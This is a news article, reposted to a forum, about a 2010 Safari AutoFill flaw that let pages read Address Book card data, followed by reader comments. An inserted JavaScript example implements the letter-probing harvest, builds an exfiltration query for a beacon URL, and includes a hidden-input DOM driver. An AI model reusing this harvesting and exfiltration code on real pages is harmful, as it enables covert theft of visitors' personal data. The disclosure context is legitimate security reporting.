Researcher Finds Safari AutoFill Security Hole


    A vulnerability in Apple's Safari browser that exposes users' personal information has been disclosed by a security researcher. Jeremiah Grossman of WhiteHat Security discovered that the AutoFill feature, which is enabled by default in Safari 4 and 5, can be abused by a web page to read the user's name, company, address and email from the Address Book card, along with any other card field whose value begins with a letter. The weakness also exists in earlier versions of Microsoft's Internet Explorer. Grossman has posted a proof-of-concept page that lets users check whether they are vulnerable.

    The exploit itself is simple: JavaScript on the attacker's page simulates keypresses from A to Z into hidden form fields named "Name," "Company," "Address," and "Email." With the default "AutoFill using info from my Address Book card" option enabled, Safari completes a field as soon as a typed letter matches the start of the corresponding card value; the script then reads the completed value and sends it to the attacker. As Grossman states in his blog post describing the vulnerability, "the entire process takes mere seconds," and enables attackers to capture information for further mayhem, "including email spam, (spear) phishing, [and] stalking." Getting creative, Grossman even notes the possibility for "blackmail if a user is de-anonymized while visiting objectionable online material," presumably via a bogus adult-content site carrying the AutoFill exploit. The technique only recovers values whose first character is a letter: simulated digit keypresses do not trigger AutoFill, so a value that starts with a number (a street address beginning with a house number, for example) is not exposed this way.
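    The probing loop from the paragraph above, as an added example that is not code from the article or from Grossman's proof-of-concept. The field names, the sample Address Book card and the `makeModelDriver` model of Safari's completion behaviour are constructed assumptions so the loop can run offline; `makeDomDriver` shows how the same loop would be bound to real hidden inputs and synthesized key events on a 2010-era browser, which current browsers no longer honour for AutoFill.

```javascript
// Added example, not Grossman's proof-of-concept or any code from the article: the
// A-to-Z probing loop described above, written against a small "typing driver" so the
// same logic runs here against a constructed model of Safari's Address Book AutoFill.

const LETTERS = "abcdefghijklmnopqrstuvwxyz";

// Assumed to match the Address Book card fields Safari 4/5 completes by default.
const PROBE_FIELDS = ["name", "company", "address", "email"];

// Type each letter into a blank field. If a single keystroke comes back as a longer
// string, AutoFill completed it and that string is the card value. Returns null when
// no letter triggers a completion, which is why digit-led values are never recovered.
function probeField(driver, field) {
  for (const letter of LETTERS) {
    driver.clear(field);
    driver.type(field, letter);
    const value = driver.read(field);
    if (value.length > 1) return value;
  }
  return null;
}

// Probe every field and collect what AutoFill disclosed.
function harvest(driver, fields = PROBE_FIELDS) {
  const disclosed = {};
  for (const field of fields) {
    const value = probeField(driver, field);
    if (value !== null) disclosed[field] = value;
  }
  return disclosed;
}

// Query string a hostile page would append to an <img> or beacon URL to ship the data.
function exfilQuery(disclosed) {
  return Object.entries(disclosed)
    .map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(v)}`)
    .join("&");
}

// Constructed model of the vulnerable behaviour (an assumption, not Safari's code):
// a typed letter matching the first character of the stored value is completed to
// the whole value; any other keystroke, digits included, is simply inserted.
function makeModelDriver(card) {
  const values = {};
  return {
    clear(field) { values[field] = ""; },
    type(field, ch) {
      const typed = (values[field] || "") + ch;
      const stored = card[field];
      const completes = /^[a-z]$/i.test(ch) && typeof stored === "string" &&
        stored.toLowerCase().startsWith(typed.toLowerCase());
      values[field] = completes ? stored : typed;
    },
    read(field) { return values[field] || ""; },
  };
}

// Browser driver: off-screen inputs plus synthesized key events, the way a 2010-era
// probe page worked. Current browsers do not AutoFill on untrusted key events.
function makeDomDriver(doc) {
  const inputs = {};
  const KeyboardEvent = doc.defaultView.KeyboardEvent;
  function input(field) {
    if (!inputs[field]) {
      const el = doc.createElement("input");
      el.name = field;
      el.style.position = "absolute";
      el.style.left = "-9999px"; // off-screen rather than display:none, so it can take focus
      doc.body.appendChild(el);
      inputs[field] = el;
    }
    return inputs[field];
  }
  return {
    clear(field) { input(field).value = ""; },
    type(field, ch) {
      const el = input(field);
      el.focus();
      el.dispatchEvent(new KeyboardEvent("keydown", { key: ch, bubbles: true }));
      el.value += ch;
      el.dispatchEvent(new KeyboardEvent("keyup", { key: ch, bubbles: true }));
    },
    read(field) { return input(field).value; },
  };
}

// Constructed sample card for the offline run: "3M" begins with a digit and is never
// disclosed, and the card has no address field at all.
const SAMPLE_CARD = { name: "Jeremiah Grossman", company: "3M", email: "jg@example.com" };

function demo() {
  const found = harvest(makeModelDriver(SAMPLE_CARD));
  return { found, query: exfilQuery(found) };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo());
}
```

    Run it with node to see the model disclose the name and email and skip the digit-led company value; `makeDomDriver(document)` binds the same loop to real inputs and shows the shape of the original page-side attack.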

    Grossman says he reported the vulnerability to Apple on June 17, following the usual responsible-disclosure practice of giving a company time to fix a flaw before it is made public. However, he says, Apple has not responded beyond an automated acknowledgement that his email was received; a follow-up message drew no reply at all, "human or robotic." He is releasing the information now to warn users about the vulnerability so they can protect themselves by disabling the default feature (in Safari's Preferences, under AutoFill, uncheck "Using info from my Address Book card").

    Grossman is set to give a talk at the Black Hat Technical Security Conference next week on vulnerabilities in default-enabled features of the four most common browsers. He has also found weaknesses in Firefox and Chrome that can reveal saved passwords, as well as a "mass cookie deleter" that can wipe out all of a user's cookies in a matter of seconds.

    Source: AppleInsider
    This article was originally published in the forum thread "Researcher Finds Safari AutoFill Security Hole", started by Paul Daniel Ash.
    Comments (39)
    1. sziklassy -
      I love that "caution bad idea" sign ROFL
    2. tudtran -
      Firefox and Chrome are so much better than Safari.
    3. flintoff -
      Good that I don't use Safari.
    4. gthugballin -
      Nice, it worked lol... too bad I have nothing worth stealing. Hack away.
    5. dsg -
      Quote (originally posted by tudtran):
      Firefox and Chrome are so much better than Safari.
      There is just something about Firefox I don't like; I can't figure out what it is either. I can't comment on Chrome because I haven't really used it.
    6. Cer0 -
      I hated Chrome. It just bothered me too much. Firefox I don't mind.
    7. iStoner -
      Chrome is the shizznit.
      Quote (originally posted by cerote):
      I hated Chrome. It just bothered me too much. Firefox I don't mind.
    8. Cer0 -
      I am sure it is nice, but like DSG I can't pinpoint the problem I have with it.
    9. qumahlin -
      Who the hell uses Safari? I love Apple, but the bottom line is Safari is **** compared to Chrome and Firefox. Its only redeeming features are the activity window and the way it handles searching by popping the words out of the page and dimming the rest of the text.

      Most companies don't even code with Safari in mind, and yes, while it's a WebKit browser, there are slight differences, as pages will not look 100% the same in Chrome and Safari.
    10. shaldi -
      Who am I compared to them, intelligence, a spy or an agent? I'm just a normal person. They can see my data or email or whatever they want inside my iPhone. I have nothing to hide, and no secrets in life. Hehehe.
    11. santacruzlocal -
      Hmm... are Apple and Windows on a level playing field?
    12. GranDaddyPurp -
      Hmm, Firefox and Chrome also have weaknesses. That's nothing new in web browsers.
    13. sdjmchattie -
      Quote (originally posted by qumahlin):
      Who the hell uses Safari? I love Apple, but the bottom line is Safari is **** compared to Chrome and Firefox. Its only redeeming features are the activity window and the way it handles searching by popping the words out of the page and dimming the rest of the text.

      Most companies don't even code with Safari in mind, and yes, while it's a WebKit browser, there are slight differences, as pages will not look 100% the same in Chrome and Safari.
      If you reckon. Safari gets 100% on the Acid3 test, so it conforms to web standards more than almost every other browser, including the most used of all, Firefox.
    14. Tyronal -
      This is a piffle in comparison to the biggest security vulnerability EVERY computer browser faces: Flash. All you have to do is type "flash" and "vulnerabilities" into a search engine and the truths will scare your pants off. After reading this stuff you'd never use it ever again. They say they fix vulnerabilities, but they just patch them, and it still gives hackers (or the FBI) FULL access to everything on your computer. I understand its necessity, but boy, it's a big gaping hole that Adobe neglects year on year. I'm glad they've made the Linux version almost unusable, because I don't use it now.
    15. Antman217 -
      Quote (originally posted by tudtran):
      Firefox and Chrome are so much better than Safari.
      Not on Mac. Safari is superior to all web browsers on Mac. Firefox is very similar in speed to Safari, and I have it installed just in case Safari can't do a certain thing, but Safari has some nice features like Top Sites and the new article reader; Firefox does have plug-ins for those, but they don't really match up to the way Safari does it. Chrome is actually slower than Safari and Firefox on my Mac for some reason. On Windows I get a totally different experience: on Windows Chrome is freakin' awesome, and I'm using Boot Camp, so it's not the computer itself, it seems to be the operating system. But I use Mac way more, so I'm sticking to Safari. Apple is pretty fast on the updates, though, so it shouldn't be long. They are pretty busy with the whole iPhone 4 reception thing, though.
    16. macsoldier -
      It's only the beginning.
    17. dale1v -
      Quote (originally posted by Antman217):
      Not on Mac. Safari is superior to all web browsers on Mac. Firefox is very similar in speed to Safari, and I have it installed just in case Safari can't do a certain thing, but Safari has some nice features like Top Sites and the new article reader; Firefox does have plug-ins for those, but they don't really match up to the way Safari does it. Chrome is actually slower than Safari and Firefox on my Mac for some reason. On Windows I get a totally different experience: on Windows Chrome is freakin' awesome, and I'm using Boot Camp, so it's not the computer itself, it seems to be the operating system. But I use Mac way more, so I'm sticking to Safari. Apple is pretty fast on the updates, though, so it shouldn't be long. They are pretty busy with the whole iPhone 4 reception thing, though.
      I doubt it's the OS. Apple software is generally awful on Windows.

      I tried to use Safari, but the address bar and UI in general just leave too much to be desired.
    18. tomcooldrummer -
      Well, this affected me. I turned on AutoFill no more than a few days ago, and it has already caused someone to hack my Facebook account. As soon as I read this article I went onto my usual sites, and it immediately told me that someone had logged onto my account in Germany, so I turned AutoFill off and changed my password. Thank you, ModMyi!
    19. Tyronal -
      Quote (originally posted by tomcooldrummer):
      Well, this affected me. I turned on AutoFill no more than a few days ago, and it has already caused someone to hack my Facebook account. As soon as I read this article I went onto my usual sites, and it immediately told me that someone had logged onto my account in Germany, so I turned AutoFill off and changed my password. Thank you, ModMyi!
      You must be the unluckiest person on the planet. In just a few days, all your usual accounts hacked. That is incredible. Considering this was just a warning of a vulnerability, not actual proof that hackers were actually doing this, and the fact that it only accesses information from a Mac's Address Book, not passwords, your story is just amazing. From what I know about Macs, their passwords are stored in a thing called Keychain, not Address Book, and you have to allow it as admin of your computer for Safari to access passwords. BTW, I'd check for malware, man; sounds like you've been compromised. Your story doesn't hold water, so I wouldn't sleep well just by turning off AutoFill from Address Book.